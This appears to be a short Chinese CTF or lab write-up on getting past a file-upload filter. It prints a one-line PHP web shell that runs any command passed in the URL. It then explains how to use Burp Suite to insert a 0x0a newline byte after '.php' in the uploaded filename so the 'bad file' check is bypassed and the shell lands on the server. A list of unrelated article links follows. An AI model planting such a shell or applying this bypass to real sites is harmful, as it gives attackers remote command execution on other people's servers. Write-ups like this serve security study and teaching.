Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
食咗未16 分钟前
Linux USB HOST EXTERNAL USB TO ETH ADAPTER优选资源分享19 分钟前
AnyDesk 便携版 v9.6.7.0:高效远程控制工具nnsix31 分钟前
Http - POST请求代码游侠35 分钟前
应用——HTTP天气查询程序猿编码36 分钟前
手动清理 TCP TIME-WAIT 套接字:Linux 内核模块的实现与原理pwn蒸鱼38 分钟前
buuctf中的ciscn_2019_es_2(栈迁移)北龙云海39 分钟前
全栈护航科研信息化:北龙云海驻场运维服务——为前沿探索提供稳定、安全的数字基座极客范儿1 小时前
从快手“12·22”事故出发:AI时代,如何构建对抗自动化攻击的动态免疫体系?Hqst_xiangxuajun1 小时前
万兆SFP光纤笼子交换机和PCIE网卡主板上起到什么作用小李独爱秋1 小时前
计算机网络经典问题透视——搜索引擎的“两大门派”与“武林新秀”